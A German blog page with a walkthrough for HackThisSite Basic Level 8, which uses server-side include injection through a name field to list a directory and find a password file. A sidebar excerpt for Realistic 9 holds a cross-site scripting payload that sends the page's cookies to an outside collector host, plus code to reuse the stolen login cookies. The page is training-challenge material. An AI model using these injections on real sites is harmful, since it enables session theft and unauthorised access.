Direkt zum Hauptbereich

hackthissite.org Level 8 Basic Lösung

Hier ist ein eingabeformular in welches du deinen Namen schreiben sollst damit es eine
Datei anlegen kann. Zum besseren Verständniss einfach mal testen, also "Mustermann" und
auf submit klicken.
Nun erscheint der Text:
Your file has been saved. Please click here view the file.
Hier ist die URL der Datei, welche angelegt wurde:

http://www.hackthissite.org/missions/basic/8/tmp/mnxdljrz.shtml

Genau, es ist eine shtml Datei also ein Server Side Include (SSI) damit kann
man Befehle auf dem Server ausführen lassen und das ergebniss wird dann
dem client übergeben!
Hier musst du aber das Verzeichniss auslesen damit wir informationen über den Inhalt
bekommen.
Geb nun einfach mal folgendes in das Feld für den Namen ein:



Richtig, ls bei unix/linux "list directory" zeigt den Inhalt eines Verzeichnisses an. Das neu
hinzugefügte hier ist "ls ../" ../ heißt ein Verzeichniss nach oben. Also nicht in
http://www.hackthissite.org/missions/basic/8/tmp/
Verzeichniss auslesen sondern in
http://www.hackthissite.org/missions/basic/8/ !!
Somit bekommst du folgende Liste:

Hi, au12ha39vc.php index.php level8.php tmp!

Your name contains 42 characters.

Und nun nimm einfach die Datei au12ha39vc.php an die Url anhängen und du bekommst
das Passwort angezeigt.

Kommentare

Beliebte Posts aus diesem Blog

Magento - Simple Google Shopping - Add PHP code direct in XML Template

Magento - Extension "Simple Google Shopping" von wyomind Um das Template anzupassen gibt es hier auch die Möglichkeit PHP code direkt in das XML Template zu schreiben.  Dies kann hilfreich sein wenn man Felder aus Magento ändern möchte und dazu ein if Konstrukt benötigt. Hier ein Beispielhaftes Template für Simple Google Shopping mit PHP code direkt im template: Wichtig: der code muss ein "return" statement besitzen. Denn nur der Wert welcher vom PHP Block returned wird, ist nacher im google shopping XML file vorhanden.   Simple Google Shopping Extension

HTS realistic 9, the Codes for the Challenge!

Here are the javascript codes for HTS Level 9: 1. code, take a look at the cookie: javascript:alert(document.cookie); 2. The xss exploit insert into the message to mr. crap: </textarea> <script>window.location="http://getTheScript/getcookiemailer.php?keks="+document.cookie;</script> 3. The code to use the stolen cookie data: javascript:document.cookie="strUsername=m-crap%40crappysoft.com";document.cookie="strPassword=94a35a3b7befff5eb2a8415af04aa16c";document.cookie="intID=1"; Now you can move the money!! 4. Deleting the session data. Log out and go to the main page of crappy soft. Go to the mailing list form. Now you need an Firefox extension like UrlParams or an Proxy with freeze function. Or you manipulate the Post data with an faked http header. How to fake http header with PHP you can take a look at this page: http://hack1n9.blogspot.com/2008/06/hackthissiteorg-level-5-basic-lsung.html But it is written in german. The faste...

Linearen Notenschlüssel mit nodejs berechnen

Linearen Notenschlüssel berechnen / Method chaining in nodejs Hintergrund/Motivation: Ein kleines altes Nebenprojekt von mir war eine Schüler/Notenverwaltung Software in Java geschrieben. Das kleine Programm ist etwas in die Jahre gekommen und da wollte ich kleine teile von der Software nach nodejs portieren und es etwas auffrischen. Und zum start habe ich die Berechnung der Noten nach einem Linearen Notenschlüssel portiert. Also die dahinter liegende Klasse. Kurze Beschreibung der Eigenschaften der Klasse: Die Klasse soll die Berechnung anhand der Maximalen zu erreichenden Punkzahl und der erreichten Punkzahl des Schülers berechnen. Es gibt folgende Attribute: defaultPoints => fallback falls maxPoints nicht gesetzt wird maxPoints => Maximal zu erreichende Punkte im Test/Arbeit reachedPonts => Erreichte Punktzahl des Schülers Darüber hinaus sollen die setter der Klasse via   Method chaining  einfacher und kürzer aufrufbar sein, hierzu ein kleiner Pse...